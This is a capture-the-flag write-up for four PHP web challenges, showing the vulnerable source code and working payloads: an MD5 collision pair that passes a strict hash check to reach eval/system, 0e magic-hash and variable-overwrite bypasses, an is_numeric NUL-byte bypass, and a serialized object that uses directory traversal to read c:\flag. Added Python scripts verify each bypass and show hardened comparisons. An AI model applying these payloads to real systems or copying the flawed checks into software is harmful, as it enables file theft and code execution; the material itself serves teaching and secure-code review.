Challenge code (deployed on Windows)
WEB1:
<?php
error_reporting(0);
if(isset($_GET['x'])&&isset($_GET['y']) && strpos($_GET['x'], 'system("type flag1.php");') !== false && strpos($_GET['y'], 'system("type flag1.php");') !== false){
    $x=$_GET['x'];
    $y=$_GET['y'];
    if((string)$x!=(string)$y&&md5($x)===md5($y)){
        eval($x.$y);
    }else{
        die("---------------------------flag在当前目录下的flag1.php文件中-----------------------------------");
    }
}else{
    highlight_file(__FILE__);
}
Use an MD5 collision to produce two different inputs with the same hash.
The tool used here is fastcoll. Download: https://github.com/iamjazz/Md5collision
1. First create the prefix file (1.txt in the writeup, init.txt in the command below) with the content: system("type flag1.php");?>//
2. Then run fastcoll_v1.0.0.5.exe -p init.txt -o 1.txt 2.txt
This produces 1.txt and 2.txt in the current directory.
Next run php Md5collision.php from the command window; it outputs the two URL-encoded strings.
Pass them as x and y respectively:
x=system%28%22type+flag1.php%22%29%3B%3F%3E%2F%2F%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%DE%D9Z%96%AA%B7k%98%C2%DB%9C%7BQC%06%11%2A%29N%01%81%12%9E%A02%AAyfl%A4%964%1F%E2%AC%CA%D9%2B8%A0%EBK%D0%DB%91%0FA%FC%D94%B7nS%A0%14.%0Fb%E4cjl%EEah%D4D%EDK%03%88%9BU%8A%E3%28%1D%08S%2F%96%9F%1AU%F5%85%0E%A6%D1Z%EEM%EC%86%FE%F1%18%1D%26%DA%F6%CC%E7%3E%9A%82I7%CA%94%E6%AEh%BE%9B%90%5D%9A%3D%A9%16W%B7%27Ry%1B%F0&y=system%28%22type+flag1.php%22%29%3B%3F%3E%2F%2F%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%DE%D9Z%96%AA%B7k%98%C2%DB%9C%7BQC%06%11%2A%29N%81%81%12%9E%A02%AAyfl%A4%964%1F%E2%AC%CA%D9%2B8%A0%EBK%D0%DB%91%8FA%FC%D94%B7nS%A0%14.%0Fb%E4%E3jl%EEah%D4D%EDK%03%88%9BU%8A%E3%28%1D%08S%2F%96%9F%1A%D5%F5%85%0E%A6%D1Z%EEM%EC%86%FE%F1%18%1D%26%DA%F6%CC%E7%3E%9A%82I7%CA%14%E6%AEh%BE%9B%90%5D%9A%3D%A9%16W%B7%A7Ry%1B%F0
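An added check, not part of the writeup or of the fastcoll/Md5collision tools: it decodes the x and y values above the way PHP's urldecode() does and confirms they are a real collision pair (same length, identical MD5, six differing bytes at the offsets where a fastcoll block pair differs) while their SHA-256 digests differ, which is the comparison the challenge would have needed to be safe. X_ENCODED and Y_ENCODED are the payload copied from above; the "19, 45, 59 per block" pattern is the standard fastcoll differential and is stated here as an assumption about fastcoll output, not something the writeup says.

```python
import hashlib
from urllib.parse import unquote_to_bytes

# The x and y values from the payload above, copied verbatim (URL-encoded as PHP's urlencode() emits them).
X_ENCODED = "system%28%22type+flag1.php%22%29%3B%3F%3E%2F%2F%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%DE%D9Z%96%AA%B7k%98%C2%DB%9C%7BQC%06%11%2A%29N%01%81%12%9E%A02%AAyfl%A4%964%1F%E2%AC%CA%D9%2B8%A0%EBK%D0%DB%91%0FA%FC%D94%B7nS%A0%14.%0Fb%E4cjl%EEah%D4D%EDK%03%88%9BU%8A%E3%28%1D%08S%2F%96%9F%1AU%F5%85%0E%A6%D1Z%EEM%EC%86%FE%F1%18%1D%26%DA%F6%CC%E7%3E%9A%82I7%CA%94%E6%AEh%BE%9B%90%5D%9A%3D%A9%16W%B7%27Ry%1B%F0"
Y_ENCODED = "system%28%22type+flag1.php%22%29%3B%3F%3E%2F%2F%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%DE%D9Z%96%AA%B7k%98%C2%DB%9C%7BQC%06%11%2A%29N%81%81%12%9E%A02%AAyfl%A4%964%1F%E2%AC%CA%D9%2B8%A0%EBK%D0%DB%91%8FA%FC%D94%B7nS%A0%14.%0Fb%E4%E3jl%EEah%D4D%EDK%03%88%9BU%8A%E3%28%1D%08S%2F%96%9F%1A%D5%F5%85%0E%A6%D1Z%EEM%EC%86%FE%F1%18%1D%26%DA%F6%CC%E7%3E%9A%82I7%CA%14%E6%AEh%BE%9B%90%5D%9A%3D%A9%16W%B7%A7Ry%1B%F0"


def php_urldecode(s: str) -> bytes:
    """Decode like PHP's urldecode(): '+' is a space and %XX is one raw byte (no text decoding)."""
    return unquote_to_bytes(s.replace("+", " "))


def analyse_pair(a: bytes, b: bytes) -> dict:
    """The facts a reviewer wants about a suspected collision pair before believing it."""
    same_length = len(a) == len(b)
    diffs = [i for i, (p, q) in enumerate(zip(a, b)) if p != q] if same_length else None
    return {
        "same_length": same_length,
        "length": len(a),
        "diff_positions": diffs,
        "md5_equal": hashlib.md5(a).digest() == hashlib.md5(b).digest(),
        "sha256_equal": hashlib.sha256(a).digest() == hashlib.sha256(b).digest(),
        # The PHP source both inputs start with, i.e. what eval($x.$y) actually runs, read up to
        # the first NUL of the zero padding fastcoll adds to reach a 64-byte block boundary.
        "code_prefix": a.split(b"\x00", 1)[0].decode("ascii"),
    }


def fastcoll_diff_positions(length: int) -> list:
    """Where a fastcoll pair is expected to differ: bytes 19, 45 and 59 of each of the two
    64-byte collision blocks that follow the padded prefix (assumption: standard fastcoll output)."""
    start = length - 128
    return [start + off for off in (19, 45, 59, 64 + 19, 64 + 45, 64 + 59)]


def check_page_payload() -> dict:
    return analyse_pair(php_urldecode(X_ENCODED), php_urldecode(Y_ENCODED))


if __name__ == "__main__":
    report = check_page_payload()
    for key, value in report.items():
        print(f"{key}: {value}")
    print("matches the fastcoll pattern:",
          report["diff_positions"] == fastcoll_diff_positions(report["length"]))
```

The takeaway for the code being attacked is in the last two dictionary entries: md5() === md5() is satisfied by inputs that differ in only six bytes, while any comparison on SHA-256 (or on the inputs themselves) is not.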
WEB5:
<?php
highlight_file('5blfg.php');
include('f' . 'lag5' . '.php');
$var = "y" . "cfl" . "ag";
$$var = str_replace('N', 'Z', 'Not the reaN flag');
$content = trim(@file_get_contents('fl' . 'a' . 'g5' . '.php'));
extract($_GET);
if (isset($$var)) {
    if ($$var != $content && md5($$var) == md5($content)) {
        echo "</br>";
        echo "$flag";
    } else {
        echo "</br>";
        echo 'please ' . 'refuel';
    }
}
?>
$$var is $ycflag, and after extract($_GET) both $ycflag and $content can be overwritten by query parameters (variable overwrite).
Pass values for ycflag and content whose MD5 digests are loosely equal (==):
?ycflag=QNKCDZO&content=TUFEPMC
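An added demonstration, not the writeup's code, of why the pair above works: PHP's == treats two strings that both look numeric as numbers, and an md5() hex digest of the form 0e followed only by digits is 0 × 10^n, which is 0. The script emulates that rule for hex digests, runs the WEB5 gate on the posted values, and shows the hardened comparison (=== or hash_equals() in PHP, hmac.compare_digest here) rejecting them. The regex emulation of PHP's numeric-string rule is an assumption that holds for hex digests only, not a general PHP == implementation.

```python
import hashlib
import hmac
import re

# PHP's "numeric string" rule restricted to what an md5() hex digest can contain (0-9, a-f):
# all digits, optionally with an exponent part. "0e<digits>" is 0 * 10^n, i.e. 0.
# Assumption: this is the PHP 7/8 rule as it applies to hex digests, nothing more general.
DIGEST_NUMERIC = re.compile(r"\d+(e\d+)?")


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_hash(digest: str) -> bool:
    """True when PHP would treat the digest as a numeric string, so == compares it as a number."""
    return DIGEST_NUMERIC.fullmatch(digest) is not None


def php_loose_eq(a: str, b: str) -> bool:
    """Emulate PHP == on two hex digests: two numeric strings are compared as floats."""
    if is_magic_hash(a) and is_magic_hash(b):
        return float(a) == float(b)
    return a == b


def web5_gate(ycflag: str, content: str) -> bool:
    """The WEB5 condition: $$var != $content && md5($$var) == md5($content)."""
    return ycflag != content and php_loose_eq(md5_hex(ycflag), md5_hex(content))


def web5_gate_fixed(ycflag: str, content: str) -> bool:
    """Same gate with the digests compared byte for byte in constant time (PHP: hash_equals())."""
    return ycflag != content and hmac.compare_digest(md5_hex(ycflag), md5_hex(content))


if __name__ == "__main__":
    for s in ("QNKCDZO", "TUFEPMC", "hello"):
        digest = md5_hex(s)
        print(s, digest, "magic (numeric string)" if is_magic_hash(digest) else "ordinary")
    print("loose == gate passes:", web5_gate("QNKCDZO", "TUFEPMC"))
    print("constant-time gate passes:", web5_gate_fixed("QNKCDZO", "TUFEPMC"))
```

A review rule that follows from this: any == or != between hash digests in PHP is a finding, regardless of the hash function, because the digest only has to start with 0e and contain no letters for the comparison to collapse to 0 == 0.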
WEB4:
<?php
highlight_file('4kbzf.php');
include('f' . 'lag4' . '.php');
$info = "";
$req = [];
$flag = trim(@file_get_contents('fl' . 'a' . 'g4' . '.php'));
ini_set("display_error", false);
error_reporting(0);
if(!isset($_GET['number'])){
    header("hint:" . hash("md5", "2djwioadopkwapodkpawkpdw.txt"));
    die("please refuel!!");
}
foreach([$_GET, $_POST] as $global_var) {
    foreach($global_var as $key => $value) {
        $value = trim($value);
        if(is_string($value)){
            $req[$key] = addslashes($value);
        }
    }
}
function is_hwhs_number($number) {
    $number = strval($number);
    $i = 0;
    $j = strlen($number) - 1;
    while($i < $j) {
        if($number[$i] !== $number[$j]) {
            return false;
        }
        $i++;
        $j--;
    }
    return true;
}
if(is_numeric($_REQUEST['number'])) {
    $info="抱歉您输入的是数字";
}
elseif($req['number']!=strval(intval($req['number']))) {
    $info = "数字必须等于其整数!!";
}
else {
    $value1 = intval($req["number"]);
    $value2 = intval(strrev($req["number"]));
    if($value1!=$value2=323){
        $info="这不是回文数字!!";
    }
    else {
        if(is_hwhs_number($req["number"])){
            $info = "{$value1} 是一个回文数字!";
        }
        else {
            var_dump($flag);
        }
    }
}
?>
is_numeric() and intval() check whether the number parameter is numeric. is_numeric() is bypassed with %00, placed at the start; but in my testing, placing it at the end also works.
%00 bypasses is_numeric(); 323 is a palindrome number; %0c is \f and %2b is +. The \f or + is added so that, after passing the $req['number']!=strval(intval($req['number'])) check, is_hwhs_number() is bypassed.
Payload: ?number=%00%2b323
Reference article: 关于PHP一些漏洞的姿势_末初的技术博客_51CTO博客
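An added walk-through, not the writeup's code, of the WEB4 filter chain in Python, to show why the NUL byte and the + are both needed and why the NUL can sit at either end. It emulates the PHP functions the challenge calls (is_numeric(), trim(), addslashes(), intval(), loose !=) only as far as this input shape needs, assuming PHP 8 numeric-string rules (leading and trailing whitespace allowed, NUL never). The two facts that decide the outcome: trim() strips NUL but not \f, and a leading sign or \f keeps the string loosely equal to its intval() while making it non-palindromic byte for byte.

```python
import re

# PHP's numeric-string syntax: optional whitespace ( \t\n\r\v\f), sign, number, exponent, whitespace.
# NUL is not whitespace, so a NUL anywhere makes is_numeric() false. Assumption: PHP 8 rules.
NUMERIC_STR = re.compile(r"[ \t\n\r\v\f]*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?[ \t\n\r\v\f]*")
LEADING_INT = re.compile(r"[ \t\n\r\v\f]*([+-]?\d+)")
TRIM_CHARS = " \t\n\r\0\x0b"   # PHP trim() default list: strips NUL but NOT \f (\x0c)


def php_is_numeric(s: str) -> bool:
    return NUMERIC_STR.fullmatch(s) is not None


def php_intval(s: str) -> int:
    """intval() on a string: leading whitespace, optional sign, digits; anything else gives 0.
    (Exponent forms such as "1e3" are not modelled; they do not occur here.)"""
    m = LEADING_INT.match(s)
    return int(m.group(1)) if m else 0


def php_trim(s: str) -> str:
    return s.strip(TRIM_CHARS)


def php_addslashes(s: str) -> str:
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def php_loose_ne(a: str, b: str) -> bool:
    """!= on two strings: if both are numeric strings they are compared as numbers."""
    if php_is_numeric(a) and php_is_numeric(b):
        return float(a) != float(b)
    return a != b


def is_hwhs_number(number: str) -> bool:
    """The challenge's byte-wise palindrome test (strict !== per character)."""
    return number == number[::-1]


def web4(raw_number: str) -> str:
    """Run one URL-decoded ?number= value through the WEB4 checks and name the branch reached."""
    request_number = raw_number                          # $_REQUEST['number']: the raw value
    req_number = php_addslashes(php_trim(raw_number))    # $req['number']: trim() then addslashes()
    if php_is_numeric(request_number):
        return "rejected: is_numeric"
    if php_loose_ne(req_number, str(php_intval(req_number))):
        return "rejected: not equal to its intval"
    value1 = php_intval(req_number)
    # The source reads `$value1!=$value2=323`, which PHP parses as $value1 != ($value2 = 323):
    # the strrev() result is overwritten, so the only value that gets past here is 323.
    value2 = 323
    if value1 != value2:
        return "rejected: not 323"
    if is_hwhs_number(req_number):
        return "palindrome, no flag"
    return "flag"


if __name__ == "__main__":
    # Constructed inputs: the writeup's payload, the NUL-at-the-end variant, the \f variant,
    # and the inputs that are stopped by one of the checks.
    for raw in ("\x00+323", "+323\x00", "\x00\x0c323", "323", "\x00323", "\x00+324"):
        print(repr(raw), "->", web4(raw))
```

The lesson for the code is that is_numeric() on $_REQUEST and intval() on the trimmed $req copy look at two different strings; validating one representation and acting on another is what lets the NUL and the sign slip through.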
WEB6:
<?php
// ini_set("display_errors", 0);
// error_reporting(0);
class Yangqidasai
{
    protected $string1;
    protected $string2;
    function __destruct()
    {
        if(($this->string1 != $this->string2) && (md5($this->string1) === md5($this->string2)))
        {
            $filename = "C:\\web\\www\\html\\".$this->string1;
            $filename = substr($filename, 0, 47);
            $char_arr = array_count_values(str_split($filename));
            arsort($char_arr);
            $char_arr = array_keys($char_arr);
            do
            {
                $char = array_shift($char_arr);
            }
            while($char == "t");
            $filename = $filename.$char;
            $newfilename1 = str_replace("../", "..\\", $filename);
            echo '<hr>';
            $newString = substr($newfilename1, 0, strlen($newfilename1) - 7);
            echo file_get_contents($newString);
        }
    }
}
highlight_file(__FILE__);
echo 'flag in c:\\flag';
unserialize($_REQUEST['xyctf']);
?>
1. Analysing the code, the value passed as string1 should be
../../../../../../../flagaaaaaa
After the code truncates, replaces and concatenates string1, the final value of $newString is: C:\web\www\html\..\..\..\..\..\..\..\flag
so that file_get_contents reads the c:\flag file by directory traversal.
2. Bypass the strict MD5 comparison (===) the same way as in WEB1
Create an x.txt file whose content is "../../../../../../../flagaaaaaa"
Run fastcoll_v1.0.0.5.exe -p x.txt -o 1.txt 2.txt
php Md5collision.php then generates the two strictly MD5-equal strings used as the values of string1 and string2
3. Generate the serialized payload
<?php
class Yangqidasai
{
protected $string1;
protected $string2;
function __construct() {
$this->string1 = urldecode('..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflagaaaaaa%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%E8%CAT%02O%E0mO%5CU66-%D4%A4%7ClC%D2h%12%18%99%92%5D%8A%83%CD%86%944%AB%FF%14%A3%EA%5Ej%3A%BD%CB%E5j%1C%CA%1F%A4%3A%99%9F%16%FC%26%EC%9Eh%14%A7jc%ABR%09%C5o%25t%BF6%B1q%F7%81%8C%1Dd%D4%21%22%1B%1D%E5%C3%27%5C%DA%818%0B%B5%F0%EE%2B%60H%D6%D3%8BH%14%A7%05+%1E6%09FSQ%00%18%23%90%EA%BD%1E%A3%D0%DEz%DC%E9%96%89%230%1E%B9');
$this->string2 = urldecode('..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflagaaaaaa%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%E8%CAT%02O%E0mO%5CU66-%D4%A4%7ClC%D2%E8%12%18%99%92%5D%8A%83%CD%86%944%AB%FF%14%A3%EA%5Ej%3A%BD%CB%E5j%1C%CA%9F%A4%3A%99%9F%16%FC%26%EC%9Eh%14%A7j%E3%ABR%09%C5o%25t%BF6%B1q%F7%81%8C%1Dd%D4%21%22%1B%1D%E5%C3%A7%5C%DA%818%0B%B5%F0%EE%2B%60H%D6%D3%8BH%14%A7%05+%1E6%09FSQ%80%17%23%90%EA%BD%1E%A3%D0%DEz%DC%E9%96%09%230%1E%B9');
}
}
$b=new Yangqidasai;
echo urlencode(serialize($b));
?>
?xyctf=O%3A11%3A%22Yangqidasai%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00string1%22%3Bs%3A192%3A%22..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflagaaaaaa%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%E8%CAT%02O%E0mO%5CU66-%D4%A4%7ClC%D2h%12%18%99%92%5D%8A%83%CD%86%944%AB%FF%14%A3%EA%5Ej%3A%BD%CB%E5j%1C%CA%1F%A4%3A%99%9F%16%FC%26%EC%9Eh%14%A7jc%ABR%09%C5o%25t%BF6%B1q%F7%81%8C%1Dd%D4%21%22%1B%1D%E5%C3%27%5C%DA%818%0B%B5%F0%EE%2B%60H%D6%D3%8BH%14%A7%05+%1E6%09FSQ%00%18%23%90%EA%BD%1E%A3%D0%DEz%DC%E9%96%89%230%1E%B9%22%3Bs%3A10%3A%22%00%2A%00string2%22%3Bs%3A192%3A%22..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflagaaaaaa%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%E8%CAT%02O%E0mO%5CU66-%D4%A4%7ClC%D2%E8%12%18%99%92%5D%8A%83%CD%86%944%AB%FF%14%A3%EA%5Ej%3A%BD%CB%E5j%1C%CA%9F%A4%3A%99%9F%16%FC%26%EC%9Eh%14%A7j%E3%ABR%09%C5o%25t%BF6%B1q%F7%81%8C%1Dd%D4%21%22%1B%1D%E5%C3%A7%5C%DA%818%0B%B5%F0%EE%2B%60H%D6%D3%8BH%14%A7%05+%1E6%09FSQ%80%17%23%90%EA%BD%1E%A3%D0%DEz%DC%E9%96%09%230%1E%B9%22%3B%7D
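An added re-implementation, not the challenge's or the writeup's code, of the path manipulation in __destruct() from step 1, so the claimed $newString value can be checked without deploying the challenge. The collision blocks never reach the path logic (substr(..., 0, 47) cuts them off), so string1 is built here from the prefix plus constructed filler instead of fastcoll output; ntpath.normpath then shows the traversal resolving to C:\flag. The stand-in for PHP's arsort assumes PHP 8's stable sort on ties, which does not matter for this input because '.' is the unique most frequent character.

```python
import ntpath
from collections import Counter

# What the PHP literal "C:\\web\\www\\html\\" evaluates to (16 characters).
WEB_ROOT = "C:\\web\\www\\html\\"

PREFIX = "../../../../../../../flagaaaaaa"   # the string1 prefix from step 1 (31 characters)
# Constructed stand-in for the 192-byte fastcoll output: the path logic only ever sees the first
# 47 bytes of WEB_ROOT + string1, so the zero padding and the two collision blocks are filler here.
STRING1_CONSTRUCTED = PREFIX + "\x00" * 33 + "X" * 128


def most_common_char_not_t(s: str) -> str:
    """array_count_values + arsort + array_keys, then array_shift until the char is not 't'.
    Counter keeps first-seen order and sorted() is stable, matching a stable arsort on ties."""
    ranked = [c for c, _ in sorted(Counter(s).items(), key=lambda kv: -kv[1])]
    while ranked:
        c = ranked.pop(0)
        if c != "t":
            return c
    return ""   # array_shift on an exhausted array gives null, which concatenates as ""


def web6_resolve(string1: str) -> str:
    """Reproduce __destruct() and return the path that file_get_contents() is given."""
    filename = (WEB_ROOT + string1)[:47]                 # substr($filename, 0, 47): exactly WEB_ROOT + PREFIX
    filename += most_common_char_not_t(filename)         # '.' wins here (14 of the 47 characters)
    newfilename1 = filename.replace("../", "..\\")       # str_replace("../", "..\\", ...)
    return newfilename1[:len(newfilename1) - 7]          # drops the trailing "aaaaaa."


def resolved_target(string1: str) -> str:
    """Normalise the traversal the way the Windows filesystem will."""
    return ntpath.normpath(web6_resolve(string1))


if __name__ == "__main__":
    print(web6_resolve(STRING1_CONSTRUCTED))
    print(resolved_target(STRING1_CONSTRUCTED))
```

Because file_get_contents() receives a path built from attacker-controlled bytes, the md5() === md5() guard in front of it is the only control, and the WEB1 check above shows that guard costs an attacker one fastcoll run; a defence has to constrain the path itself (an allow-list of files, or rejecting any input containing "..") rather than the hash of the input.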